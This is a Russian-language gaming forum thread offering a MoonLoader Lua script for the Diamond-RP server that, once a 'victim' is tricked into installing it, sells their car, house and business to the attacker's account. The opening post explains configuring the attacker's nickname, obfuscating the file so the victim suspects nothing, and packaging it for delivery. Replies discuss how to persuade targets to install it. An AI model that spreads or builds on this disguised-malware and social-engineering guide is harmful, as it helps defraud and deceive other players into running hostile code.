[Diamond-RP] Автоматическая продажа имущества
|
|
cover |
Дата: Среда, 18.04.2018, 09:15 | Сообщение # 1
|
Бывалый
Статус: Offline
|
Приветствую всех. Данный скрипт позволяет продать имущество человека, которому вы его перешлете. Да-да, вы скажете, что это слишком сложно, заставить жертву установить подобный скрипт и т.д. но, лох - не мамонт, даже в 2018. Все зависит от Вас.
Функции:
- Автоматическая продажа автомобиля (Вам лично по ИД'у); - Автоматическая продажа дома (Вам лично по ИД'у); - Автоматическая продажа бизнеса (В госс); - Автоматическая продажа всего имущества поочередно (Приоритет: автомобиль, дом, бизнес).
Настройка скрипта:
Для того, чтобы начать настройку скрипта, нужно его открыть через любой редактор текста: Блокнот, Notepad++, Atom и т.д. Для начала нужно настроить цены продажи и команду для продажи бизнеса, чтобы имущество, если Вы хотите слить автомобиль либо дом, продавалось по нужной для Вас цене, либо же у жертвы АЗС (Она продается не по команде /business), сменить команду продажи бизнеса, и, наконец, указать свой ник, на который будет продаваться имущество. Все это делается непосредственно в самом скрипте. Вводишь информацию нужно между одиночных скобок. И так, что за что отвечает:
- Строчка nickName = ' ' - Ваш ник-нейм аккаунта, на который будет продаваться имущество; - Строчка carPrice = ' ' - Цена продажи автомобиля; - Строчка housePrice = ' ' - Цена продажи дома; - Строчка bizCommand = ' ' - Команда продажи бизнеса.
Шифрование содержания скрипта:
После ввода всех нужных данные, сохраняем файл и переходим к следующему пункту - крипт файла. Для того, чтобы жертва ничего не заподозрила(Почти не заподозрила), нужно "скрить" код скрипта (К сожалению, в lua это можно сделать не на все 100%). Тут есть один подвох, криптовать файл нужно под версию moonloader, если она выше 0.25-beta, то есть, для версии 0.25 - свой криптор и для 0.26 тоже свой. Тут решать Вам, на какой версии мунлоадера вы хотите "подсунуть" данный скрипт, я же прикреплю в архив два киптора и залью две версии moonloader. И так, приступим. Для того, чтобы закриптовать файл, нужно просто скопировать основной файл, стандартное название которого auto sell property.lua в папку с криптором и перетащить этот файл на файл под названием complite.bat - профит, создался новый файл с расширением .luac - это и есть наш закриптованный файл. Далее мы просто берем этот файл и перекидываем его в архив, который предназначен для жертвы, а именно, в папку moonloader и все, архив готов к отправке Вашей жертвы.
Активация функций по-умолчанию:
Y + 1 - Продать автомобиль; P + 1 - Продать дом; I(И англ) + 1 - Продать бизнес; B + 1 - Продать все имущество.
Необходимые файлы для работы скрипта:
Для того, чтобы скрипт работал у жертвы, необходимы следующие компоненты (Все эти файлы есть в архиве):
- Moonloader 0.25+; - CLEO библиотека 4.3; - SAMPFUNCS 5.3.3
Скачать: Click
Другая информация:
Вот и все, согласен, все достаточно запутанно, но я постарался описать все действия максимльно доходчивым языком. Данный скрипт был сделан не чисто случайно, по просьбе знакомого. При распространении данного скрипта, сохранение авторства обязательный пункт.
Сообщение отредактировал cover - Среда, 18.04.2018, 15:59 |
|
|
|
Aidos1 |
Дата: Среда, 18.04.2018, 10:53 | Сообщение # 2
|
Боец
|
Хороший софт, но был бы лучше сделать на CLEO формата, т.к мунлоадер не у всех есть
|
|
|
|
cover |
Дата: Среда, 18.04.2018, 11:46 | Сообщение # 3
|
Бывалый
|
Aidos1, первое, клей умер, второе, мунлоадер можно скинуть жертве.
|
|
|
|
easyrak228 |
Дата: Среда, 18.04.2018, 12:29 | Сообщение # 4
|
Боец
|
Цитата cover ( ) первое, клей умер, второе, мунлоадер можно скинуть жертве Ну у большинства людей нету мунлоадера, но есть клео, и я даже не представляю себе что нужно придумать об этом скрипте, чтобы он для его работоспособности установил мунлоадер, как по мне - тупо никто не будет этого делать, а почти все богатые игроки с норм бизнесом играют без читов, тоесть возможно у некоторых будет папка с клео, но мунлоадер врятли. Также меня интересует следущее:Цитата cover ( ) - Автоматическая продажа всего имущества поочередно (Приоритет: автомобиль, дом, бизнес). Припустим что нужно забрать у жертвы бизнес, затем дом (ну скажем что бизнес 15кк стоит, а дом 1кк), если я с этим игроков буду около его бизнеса, мне продается бизнес, но дом уже не купить, т.к нужно быть около него, а после продажи бизнеса мне по дешевой цене он сразу же это заметит, и напишет /q, затем удалит скрипт. Итог: будь добр, переведи лучше скрипт на клео, ибо реально с мунлоадером нужно очень долго переубеждать жертву и выносить себе мозги, а с клео всё просто. Также выложи клео обычное, и в закриптованом виде, и всё. В остальном твой скрипт супер, с меня плюсик. P.S Перезалей ссылку на скачивание скрипта на lua, ибо ошибка Not Found Error 404
Сообщение отредактировал easyrak228 - Среда, 18.04.2018, 12:32 |
|
|
|
cover |
Дата: Среда, 18.04.2018, 12:58 | Сообщение # 5
|
Бывалый
|
easyrak228, скрипт будет на lua. У меня нету ни времени ни желания запускать помойку под названием "Sanny builder". Все зависит от Вашей фантазии. Ссылку обновил.
|
|
|
|
easyrak228 |
Дата: Среда, 18.04.2018, 13:03 | Сообщение # 6
|
Боец
|
Цитата cover ( ) Ссылку обновил. Этот файл нельзя открыть, так как он нарушает Условия использования.
Сообщение отредактировал easyrak228 - Среда, 18.04.2018, 13:04 |
|
|
|
cover |
Дата: Среда, 18.04.2018, 13:13 | Сообщение # 7
|
Бывалый
|
easyrak228, у меня все скачивает и открывает, смотри проблемы у себя.
|
|
|
|
easyrak228 |
Дата: Среда, 18.04.2018, 13:17 | Сообщение # 8
|
Боец
|
Цитата cover ( ) у меня все скачивает и открывает, смотри проблемы у себя. Возможно у тебя нету ошибки из-за того, что ты открываешь этот файл с своей почты gmail, зайди в режиме инкогнито, затем попробуй сам открыть свой файл.
|
|
|
|
XaXbIch |
Дата: Среда, 18.04.2018, 13:52 | Сообщение # 9
|
Новичок
|
Скрипт офигенный, но, соглашусь с человеком, который писал выше про перевод на клео, мунлоадер есть только у тех людей, кто реально читерит, а у кого есть хороший бизнес и дом, вряд ли будут этим заниматься, но у них могут быть скрипты например показ фпс клео и такие же не запрещенные клео и так будет намного проще развести человека
|
|
|
|
cover |
Дата: Среда, 18.04.2018, 14:13 | Сообщение # 10
|
Бывалый
|
XaXbIch, если что, то мунлодер это та же клео библиотека, только в разы лучше. Как со стороны разработки, так и со стороны использования.
|
|
|
|
Excentic |
Дата: Среда, 18.04.2018, 14:20 | Сообщение # 11
|
Боец
|
Ссылка снова не работает, нарушение правил использования Google Диска
|
|
|
|
XaXbIch |
Дата: Среда, 18.04.2018, 14:21 | Сообщение # 12
|
Новичок
|
cover, Но мунлоадер, есть у единиц кто держит топовые бизы и дома
|
|
|
|
izreker228 |
Дата: Среда, 18.04.2018, 14:22 | Сообщение # 13
|
Авторитет
|
easyrak228, клео - та фигня, мягко скажем, где функционал довольно сильно ограничен, где нормально даже файл не закриптуешь, да и луа сейчас развивается и распространяется с небывалой скоростью. Настанет время и библиотека луа нужна будет также как и клео с сампфунксом.
Сообщение отредактировал izreker228 - Среда, 18.04.2018, 19:47 |
|
|
|
cover |
Дата: Среда, 18.04.2018, 16:00 | Сообщение # 14
|
Бывалый
|
Перезалил, сейчас должно работать
|
|
|
|
denis_fandeev |
Дата: Среда, 18.04.2018, 16:26 | Сообщение # 15
|
Боец
|
Ребята , а чего вы возникаете, клео, не клео.. Кому надо скрипт - Скачает Мунлуадер, делов то максимум на 2-4 минуты
|
|
|
|